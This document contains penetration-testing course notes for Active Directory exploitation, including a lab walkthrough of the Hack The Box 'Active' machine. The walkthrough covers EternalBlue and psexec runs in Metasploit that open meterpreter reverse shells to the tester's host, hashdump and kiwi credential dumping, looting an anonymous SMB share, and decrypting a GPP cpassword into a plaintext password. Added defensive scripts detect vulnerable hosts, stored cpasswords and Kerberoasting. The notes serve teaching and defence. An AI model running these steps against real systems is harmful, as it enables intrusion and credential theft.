Week 10: MS17-010, GPP/cPasswords, and Kerberoasting
AD Exploitation Part 3
Blue
If you see SMB on a network, immediately check whether it's vulnerable to MS17-010. The check can take a service down, so ask before running it.
nmap -Pn -p445 --script=smb-vuln-ms17-010 <ip>
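Added example (not from the course notes and not part of nmap): once the check above has been run with -oX, this script pulls the smb-vuln-ms17-010 state out of the XML so each host lands in the report as one line. The host addresses and script output in SAMPLE_NMAP_XML are constructed; only the element layout (hostscript/script/table/elem with key="state") follows the shape nmap's vulns library writes.

```python
"""Summarise smb-vuln-ms17-010 results from an nmap -oX report.

Added example for these notes; not nmap's code and not from the course.
SAMPLE_NMAP_XML is a constructed fragment: the addresses are made up and
only the hostscript/script/table/elem layout mirrors real nmap output.
"""
import sys
import xml.etree.ElementTree as ET

SCRIPT_ID = "smb-vuln-ms17-010"

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -Pn -p445 --script=smb-vuln-ms17-010 -oX ms17.xml 10.10.10.0/24">
  <host><status state="up"/><address addr="10.10.10.11" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port></ports>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="VULNERABLE">
        <table key="CVE-2017-0143">
          <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
          <elem key="state">VULNERABLE</elem>
          <elem key="disclosure">2017-03-14</elem>
        </table>
      </script>
    </hostscript>
  </host>
  <host><status state="up"/><address addr="10.10.10.12" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port></ports>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="Could not negotiate a connection:SMB: Failed to receive bytes: ERROR"/>
    </hostscript>
  </host>
  <host><status state="up"/><address addr="10.10.10.13" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="closed"/></port></ports>
  </host>
</nmaprun>
"""


def parse_ms17_010(xml_text):
    """Return {ipv4: state} for every host in the report.

    state is nmap's own wording ("VULNERABLE", "NOT VULNERABLE", ...) when the
    script produced a result table, "ERROR" when the script ran but gave no
    state (connection problems), and "NOT RUN" when the script never fired
    (e.g. port 445 closed).
    """
    results = {}
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr = next((a.get("addr") for a in host.findall("address")
                     if a.get("addrtype") == "ipv4"), None)
        if addr is None:
            continue
        state = "NOT RUN"
        # vuln scripts are hostrule scripts, but walk every <script> under the
        # host so port-level placement is handled too
        for script in host.iter("script"):
            if script.get("id") != SCRIPT_ID:
                continue
            elem = next((e for e in script.iter("elem") if e.get("key") == "state"), None)
            state = elem.text.strip() if elem is not None and elem.text else "ERROR"
        results[addr] = state
    return results


def vulnerable_hosts(xml_text):
    """Hosts to list in the finding: nmap reports VULNERABLE or LIKELY VULNERABLE."""
    return sorted(ip for ip, state in parse_ms17_010(xml_text).items()
                  if state.startswith(("VULNERABLE", "LIKELY VULNERABLE")))


if __name__ == "__main__":
    # usage: python ms17_report.py ms17.xml   (falls back to the constructed sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_NMAP_XML
    for ip, state in sorted(parse_ms17_010(text).items()):
        print(f"{ip:16} {state}")
    print("report these:", ", ".join(vulnerable_hosts(text)) or "none")
```

Hosts marked NOT RUN or ERROR are not clean; they need a second look (firewalled 445, SMB1 disabled, or a timeout) before they are left off the finding.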
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
meterpreter > sysinfo
meterpreter > hashdump
meterpreter > shell
c:\Users\Administrator>arp -a
c:\Users\Administrator>route print
# check whether the machine is dual-homed: with two NICs we can pivot
# e.g. if it sits on both 10.10.10.X and 10.10.11.X
c:\Users\Administrator>netstat -ano
^C terminate channel -> back to meterpreter
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > load kiwi # this is x64
meterpreter > creds_all
meterpreter > wifi_list
Mimikatz is for 32-bit architectures and kiwi is for 64-bit architectures.
Active
A 'realistic' box. Likely a domain controller, since it's running DNS, Kerberos and LDAP for Active Directory. Domain: active.htb. When there's SMB, check for anonymous login. See Group Policy Pwnage.
Enumeration
Likely a Domain Controller since it's running DNS, Kerberos and LDAP. Domain: active.htb. As is common on domain controllers, SMB message signing is enabled and required. Most SMB and NTLM relay work is done against machines other than the Domain Controller, since signing is usually turned off on those.
We could maybe dump LDAP information, but we typically won't have access to that without credentials. Ports 445 and 139 are very interesting because SMB is behind a lot of exploits.
Let's try to list out the contents of the smb directory.
root@kali:~/Security/HackTheBox/active# smbclient -L \\\\10.10.10.100\\
Enter WORKGROUP\root's password: # just pressed enter
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available
Anonymous login is a finding. Absolutely list shares on a report. Let's see what we can connect to; the juiciest folders are C$ and ADMIN$.
root@kali:~/Security/HackTheBox/active# smbclient \\\\10.10.10.100\\ADMIN$
Enter WORKGROUP\root's password:
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
root@kali:~/Security/HackTheBox/active# smbclient \\\\10.10.10.100\\C$
Enter WORKGROUP\root's password:
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
root@kali:~/Security/HackTheBox/active# smbclient \\\\10.10.10.100\\IPC$
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ^C
root@kali:~/Security/HackTheBox/active# smbclient \\\\10.10.10.100\\NETLOGON
Enter WORKGROUP\root's password:
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
root@kali:~/Security/HackTheBox/active# smbclient \\\\10.10.10.100\\Replication
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ^C
root@kali:~/Security/HackTheBox/active# smbclient \\\\10.10.10.100\\SYSVOL
Enter WORKGROUP\root's password:
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
root@kali:~/Security/HackTheBox/active# smbclient \\\\10.10.10.100\\Users
Enter WORKGROUP\root's password:
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
We can connect to Replication and IPC$. Replication might be a backup of something. Let's mget everything in Replication.
root@kali:~/Security/HackTheBox/active# smbclient \\\\10.10.10.100\\Replication
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as GPE.INI (0.4 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as GptTmpl.inf (3.1 KiloBytes/sec) (average 1.3 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.5 KiloBytes/sec) (average 1.3 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Registry.pol (9.4 KiloBytes/sec) (average 2.8 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as GPT.INI (0.1 KiloBytes/sec) (average 2.4 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as GptTmpl.inf (12.5 KiloBytes/sec) (average 3.8 KiloBytes/sec)
Groups.xml is promising. Let's cat active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml.
Groups.xml belongs to GPP (Group Policy Preferences), which lets Domain Admins create domain policies with embedded credentials. In it we find userName="active.htb\SVC_TGS" and cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ". SVC_TGS is the Ticket Granting Service. Groups.xml exists on some active domains, usually older ones, but migrated domains may still have it. You can also set one up as a honeypot: a GPP whose credentials have never been used. As soon as those credentials are used, you know there's an attacker on the network.
root@kali:~/Security/HackTheBox/active# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
GPPstillStandingStrong2k18
New creds: active.htb\SVC_TGS with password GPPstillStandingStrong2k18. We could try them across the network with crackmapexec, log in to SMB with this account, or use psexec on this machine. Another tactic is Kerberoasting.
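Added example, not part of the notes and not gpp-decrypt: a SYSVOL sweep that a defender (or a tester writing up the finding) can run over a copy of the share to list every Preferences item that still carries a cpassword, without decrypting anything. The sample tree it builds mirrors the Replication layout pulled above, but the cpassword value is a placeholder and the second GPO's clean Groups.xml is constructed; the list of file names that can carry cpassword comes from Microsoft's MS14-025 guidance.

```python
"""List Group Policy Preferences items that still embed a cpassword.

Added example for these notes, not a tool from the course. Walks a local
copy of SYSVOL (the Replication share above, or \\\\domain\\SYSVOL on a DC)
and reports every Preferences XML element with a non-empty cpassword so the
GPOs can be cleaned up. Nothing is decrypted. The sample tree is constructed:
the GPO GUIDs and layout follow the share above, the cpassword is a placeholder.
"""
import os
import re
import sys
import tempfile
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Preference files that can carry cpassword (MS14-025); compared case-insensitively.
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "drives.xml", "printers.xml"}
# The attribute naming the account differs per preference type.
ACCOUNT_ATTRS = ("userName", "username", "accountName", "runAs")
GUID_RE = re.compile(r"\{[0-9A-Fa-f-]{36}\}")


@dataclass
class Finding:
    path: str
    gpo_guid: str
    element: str
    account: str
    cpassword_len: int


def find_cpasswords(sysvol_root):
    """Return one Finding per element that has a non-empty cpassword attribute."""
    findings = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for name in files:
            if name.lower() not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue  # truncated or non-XML file: skip it, not a finding
            match = GUID_RE.search(path)
            guid = match.group(0) if match else "?"
            for el in tree.iter():
                cp = el.attrib.get("cpassword", "")
                if not cp:
                    continue  # attribute absent or empty: no stored password
                account = next((el.attrib[a] for a in ACCOUNT_ATTRS if a in el.attrib), "?")
                findings.append(Finding(path, guid, el.tag, account, len(cp)))
    return findings


def build_sample_sysvol():
    """Constructed SYSVOL copy: one GPO with a cpassword, one without."""
    root = tempfile.mkdtemp(prefix="sysvol_")
    policies = os.path.join(root, "active.htb", "Policies")
    leaky = os.path.join(policies, "{31B2F340-016D-11D2-945F-00C04FB984F9}",
                         "MACHINE", "Preferences", "Groups")
    clean = os.path.join(policies, "{6AC1786C-016F-11D2-945F-00C04fB984F9}",
                         "MACHINE", "Preferences", "Groups")
    os.makedirs(leaky)
    os.makedirs(clean)
    with open(os.path.join(leaky, "Groups.xml"), "w") as f:
        f.write('<?xml version="1.0" encoding="utf-8"?>\n'
                '<Groups><User name="active.htb\\SVC_TGS">'
                '<Properties action="U" userName="active.htb\\SVC_TGS" '
                'cpassword="PLACEHOLDER-NOT-A-REAL-CPASSWORD"/></User></Groups>')
    with open(os.path.join(clean, "Groups.xml"), "w") as f:
        f.write('<?xml version="1.0" encoding="utf-8"?>\n'
                '<Groups><User name="localuser">'
                '<Properties action="U" userName="localuser" cpassword=""/></User></Groups>')
    return root


if __name__ == "__main__":
    # usage: python gpp_sweep.py /path/to/sysvol_copy   (default: constructed sample)
    root = sys.argv[1] if len(sys.argv) > 1 else build_sample_sysvol()
    for f in find_cpasswords(root):
        print(f"{f.gpo_guid} {f.element} account={f.account} "
              f"cpassword={f.cpassword_len} chars {f.path}")
```

Every hit is a finding even if the account no longer exists: the fix is to remove the preference item (patched DCs refuse to write new cpasswords but keep old ones), and the honeypot idea above is the one case where you leave it in on purpose and alert on logons for that account instead.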
Kerberoasting
Kerberos: an authentication protocol using tickets to communicate and authenticate.
We have a server that acts as the KDC (Key Distribution Center) and another computer, the client. The client wants to authenticate, so it sends its credentials to the KDC and asks for a TGT (ticket-granting ticket). The KDC checks the creds and, if they are good, sends back a secret key (encrypted by the TGS) that is stored on the client until the ticket expires. There are also services (SQL, antivirus, etc.) that the client might want to connect to; each service has a Service Principal Name (SPN). To connect, the client has to ask the KDC for permission: it presents its ticket to the KDC and asks to connect to the service. With any valid ticket or TGT, we can request a TGS ticket for an SPN.
Impacket lets us do this; my copy is at /opt/impacket/examples/GetUserSPNs.py.
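Added example for the detection side, not from the notes: on the DC, every TGS request above is logged as event 4769, and Kerberoasting shows up there as RC4 tickets (TicketEncryptionType 0x17) for SPNs that belong to user accounts, usually several in a burst from one requester. SAMPLE_EVENTS is a constructed list of dicts shaped like the 4769 EventData fields (the svc_* SPNs, requesters and timestamps are made up); the two rules below flag a single RC4 user-SPN request and escalate a burst.

```python
"""Flag Kerberoasting indicators in Windows event 4769 (TGS request) records.

Added example for these notes, not a tool from the course. SAMPLE_EVENTS is
constructed to mimic the 4769 EventData field names; the SPN accounts,
requesters and timestamps are made up.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# TicketEncryptionType 0x17 is RC4-HMAC: the ticket is keyed by the account's
# NT hash, which is the cheapest type to guess offline and the usual roast target.
RC4_HMAC = "0x17"

SAMPLE_EVENTS = [
    # Ordinary AES ticket for a computer-account SPN: benign.
    {"time": "2020-09-01T22:30:01", "TargetUserName": "jdoe@ACTIVE.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12", "Status": "0x0",
     "IpAddress": "::ffff:10.10.10.51"},
    # TGT renewal: the service is krbtgt, which is never the roast target.
    {"time": "2020-09-01T22:30:05", "TargetUserName": "jdoe@ACTIVE.HTB",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x17", "Status": "0x0",
     "IpAddress": "::ffff:10.10.10.51"},
    # A legacy app still forcing RC4 for one user-account SPN: worth a look, not a burst.
    {"time": "2020-09-01T22:30:40", "TargetUserName": "appuser@ACTIVE.HTB",
     "ServiceName": "svc_legacy", "TicketEncryptionType": "0x17", "Status": "0x0",
     "IpAddress": "::ffff:10.10.10.60"},
    # Burst: one account asks for RC4 tickets to several user-account SPNs within seconds.
    {"time": "2020-09-01T22:31:10", "TargetUserName": "svc_tgs@ACTIVE.HTB",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "Status": "0x0",
     "IpAddress": "::ffff:10.10.14.66"},
    {"time": "2020-09-01T22:31:11", "TargetUserName": "svc_tgs@ACTIVE.HTB",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "Status": "0x0",
     "IpAddress": "::ffff:10.10.14.66"},
    {"time": "2020-09-01T22:31:11", "TargetUserName": "svc_tgs@ACTIVE.HTB",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "Status": "0x0",
     "IpAddress": "::ffff:10.10.14.66"},
    {"time": "2020-09-01T22:31:12", "TargetUserName": "svc_tgs@ACTIVE.HTB",
     "ServiceName": "svc_print", "TicketEncryptionType": "0x17", "Status": "0x0",
     "IpAddress": "::ffff:10.10.14.66"},
    # Failed request (Status 0x7 = KDC_ERR_S_PRINCIPAL_UNKNOWN): no ticket was issued,
    # and failures carry no usable encryption type.
    {"time": "2020-09-01T22:31:13", "TargetUserName": "svc_tgs@ACTIVE.HTB",
     "ServiceName": "svc_gone", "TicketEncryptionType": "0xffffffff", "Status": "0x7",
     "IpAddress": "::ffff:10.10.14.66"},
]


def event_time(event):
    return datetime.fromisoformat(event["time"])


def is_roast_candidate(event):
    """A successful TGS request for a user-account SPN, issued as an RC4 ticket."""
    service = event["ServiceName"]
    return (event["Status"] == "0x0"
            and event["TicketEncryptionType"] == RC4_HMAC
            and service.lower() != "krbtgt"      # TGT traffic, not a service ticket
            and not service.endswith("$"))       # computer accounts have random passwords


def detect_kerberoast(events, window=timedelta(seconds=60), threshold=3):
    """Return alerts: one rc4_spn_burst per requester that hit >= threshold distinct
    user-account SPNs inside `window`, else one rc4_user_spn per candidate event."""
    by_requester = defaultdict(list)
    for e in events:
        if is_roast_candidate(e):
            by_requester[(e["TargetUserName"], e["IpAddress"])].append(e)

    alerts = []
    for (user, src), evs in by_requester.items():
        evs.sort(key=event_time)
        burst = set()
        for i, first in enumerate(evs):
            deadline = event_time(first) + window
            services = {e["ServiceName"] for e in evs[i:] if event_time(e) <= deadline}
            if len(services) >= threshold:
                burst |= services
        if burst:
            alerts.append({"kind": "rc4_spn_burst", "requester": user,
                           "source": src, "services": sorted(burst)})
        else:
            for e in evs:
                alerts.append({"kind": "rc4_user_spn", "requester": user,
                               "source": src, "services": [e["ServiceName"]]})
    return alerts


if __name__ == "__main__":
    for a in detect_kerberoast(SAMPLE_EVENTS):
        print(f"{a['kind']:14} {a['requester']} from {a['source']}: {', '.join(a['services'])}")
```

The RC4 rule only stays high-signal if the domain actually stops using RC4: set service accounts to AES-only (msDS-SupportedEncryptionTypes), give them long random passwords or move them to gMSAs, and the remaining 0x17 requests for user SPNs are almost all roasting attempts.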
msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set RHOSTS 10.10.10.100
RHOSTS => 10.10.10.100
msf5 exploit(windows/smb/psexec) > set SMBDomain active.htb
SMBDomain => active.htb
msf5 exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf5 exploit(windows/smb/psexec) > set SMBPass Ticketmaster1968
SMBPass => Ticketmaster1968
msf5 exploit(windows/smb/psexec) > run
...
[*] 10.10.10.100:445 - Selecting PowerShell target
...
[*] Exploit completed, but no session was created.
Let's try exploit targets other than automatic.
msf5 exploit(windows/smb/psexec) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
1 PowerShell
2 Native upload
3 MOF upload
msf5 exploit(windows/smb/psexec) > set target 2
target => 2
msf5 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.100 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain active.htb no The Windows domain to use for authentication
SMBPass Ticketmaster1968 no The password for the specified username
SMBUser administrator no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/smb/psexec) > set LHOST 10.10.14.66
LHOST => 10.10.14.66
msf5 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 10.10.14.66:4444
[*] 10.10.10.100:445 - Connecting to the server...
[*] 10.10.10.100:445 - Authenticating to 10.10.10.100:445|active.htb as user 'administrator'...
[*] 10.10.10.100:445 - Selecting PowerShell target
[*] 10.10.10.100:445 - Executing the payload...
[+] 10.10.10.100:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (180291 bytes) to 10.10.10.100
[*] Meterpreter session 1 opened (10.10.14.66:4444 -> 10.10.10.100:57946) at 2020-09-01 22:33:05 -0400
meterpreter > sysinfo
Computer : DC
OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : el_GR
Domain : ACTIVE
Logged On Users : 1
Meterpreter : x86/windows
Okay, we got a meterpreter session, but meterpreter is x86 and the machine is x64. Let's try again with a different payload.
msf5 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 10.10.14.66:4444
[*] 10.10.10.100:445 - Connecting to the server...
[*] 10.10.10.100:445 - Authenticating to 10.10.10.100:445|active.htb as user 'administrator'...
[*] 10.10.10.100:445 - Uploading payload... NKFqsUot.exe
[*] 10.10.10.100:445 - Created \NKFqsUot.exe...
[+] 10.10.10.100:445 - Service started successfully...
[*] Sending stage (206403 bytes) to 10.10.10.100
[*] 10.10.10.100:445 - Deleting \NKFqsUot.exe...
[*] Meterpreter session 4 opened (10.10.14.66:4444 -> 10.10.10.100:57982) at 2020-09-01 22:40:44 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
meterpreter > shell
Process 1820 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>type C:\Users\SVC_TGS\Desktop\user.txt
type C:\Users\SVC_TGS\Desktop\user.txt
{censored}
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
{censored}